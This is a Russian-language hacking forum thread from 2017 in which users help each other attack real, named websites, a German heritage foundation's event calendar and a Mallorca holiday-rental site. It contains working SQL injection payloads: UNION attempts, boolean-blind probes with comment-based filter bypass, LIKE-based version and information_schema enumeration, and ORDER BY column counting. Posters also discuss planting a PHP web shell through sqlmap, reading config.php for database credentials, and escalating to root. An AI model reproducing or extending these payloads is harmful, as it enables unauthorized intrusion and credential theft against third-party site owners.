ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.04.2017, 20:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от DezMond™
DezMond™ said:
↑
помогите вывод сделать, тайм бейс не крутит(
Код:
Code:
https://www.denkmalschutz.de/denkmale-erleben/terminkalender.html?tx_igcalendar_pi1[termin][eventSuche]=1&tx_igcalendar_pi1[state]=118)+union/**//**//**/select+1+--+
вывод через union мне добиться не удалось, но там boolen есть
Код:
Code:
118)/**/AND/**/1=2+--+s' | grep 'event_417'
118)/**/AND/**/1=1+--+s' | grep 'event_417'
хм что интересно функции substring,mid,right,left по какой то причине на работают.. но нормально работает like, версия базы 5.6
Код:
Code:
118)/**/AND/**/version()*1+like+%275.6%%27+--+s' | grep 'event_417'
к information_schema тоже доступ есть
Код:
Code:
118)/**/AND/**/(select+table_name+from+information_schema.tables+limit+1)+like+%27%%27+--+s' | grep 'event_417'
ещё там операция = не всегда работает, лучше юзать like
скульмап по какой то причине в упор скулю не видит
-----------
чорт, там запятая фильтруется -_-
|
|
|
|
05.04.2017, 22:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
3552
Репутация:
0
|
|
Сообщение от ACat
ACat said:
↑
можно. Можно к примеру попробовать рутнуть сервер.
$uname -a
p.s. а если нету прав - поискать где есть. к примеру папки с аватарками. Ну если честно, upload там спокойно льётся через sqlmap, но если потом через этот upload лить shell, то он не выполняется, ощущение такое как будто нет поддержки php :/
|
|
|
|
05.04.2017, 22:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
3552
Репутация:
0
|
|
Сообщение от BabaDook
BabaDook said:
↑
не выполняется потому что php не отрабатывает Именно
|
|
|
|
05.04.2017, 22:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
3552
Репутация:
0
|
|
Сообщение от BabaDook
BabaDook said:
↑
Это потому что шелл не отрабатывает? В общем, заливаю upload, через него заливаю шелл, открыв его сервер его не обрабатывает как php, а выводит просто текст с кодом.
Хотя upload работает нормально.
Сообщение от None
шелл на html?
php
|
|
|
|
06.04.2017, 04:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
60408
Репутация:
0
|
|
Сообщение от t0ma5
t0ma5 said:
↑
вывод через union мне добиться не удалось, но там boolen есть
Код:
Code:
118)/**/AND/**/1=2+--+s' | grep 'event_417'
118)/**/AND/**/1=1+--+s' | grep 'event_417'
хм что интересно функции substring,mid,right,left по какой то причине на работают.. но нормально работает like, версия базы 5.6
Код:
Code:
118)/**/AND/**/version()*1+like+%275.6%%27+--+s' | grep 'event_417'
к information_schema тоже доступ есть
Код:
Code:
118)/**/AND/**/(select+table_name+from+information_schema.tables+limit+1)+like+%27%%27+--+s' | grep 'event_417'
ещё там операция = не всегда работает, лучше юзать like
скульмап по какой то причине в упор скулю не видит
-----------
чорт, там запятая фильтруется -_-
Сообщение от l0mt1k
l0mt1k said:
↑
Ну если честно, upload там спокойно льётся через sqlmap, но если потом через этот upload лить shell, то он не выполняется, ощущение такое как будто нет поддержки php :/ Стоп, что-то я не понял... Есть иньжект, sqlmap раскрутил его, залил через mysql в файл.php код и код не исполняется?
Ааа, понял, в папке, куда залит шелл нету прав...
Попробуй прочитать конфиг.php. Там будет логин и пароль подключения к БД.
ssh mysql@server
|
|
|
|
06.04.2017, 14:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
мимо, sqlmap не видит самую простую инъекцию and 1=1/and 1=2 впрочем даже если бы видел тамперы там не помогут, фильтруются запятые, плюс некоторые запросы чуть меняешь логику - не отрабатывают, там проще свой скрипт набросать
|
|
|
|
07.04.2017, 11:05
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
чё можно сделать?
Код:
Code:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604'
|
|
|
07.04.2017, 14:00
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме:
44902
Репутация:
0
|
|
Сообщение от DezMond™
DezMond™ said:
↑
чё можно сделать?
Код:
Code:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604'
Код:
Code:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604)+order+by+24+--+-
|
|
|
|
07.04.2017, 14:11
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Сообщение от ZodiaX
ZodiaX said:
↑
Код:
Code:
http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604)+order+by+24+--+-
а дальше? какой толк подбирать колонки, если нет вывода?
|
|
|
|
07.04.2017, 14:37
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме:
44902
Репутация:
0
|
|
Сообщение от DezMond™
DezMond™ said:
↑
а дальше? какой толк подбирать колонки, если нет вывода? Да, сорри, думал как слепую можно раскрутить, ан нет.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
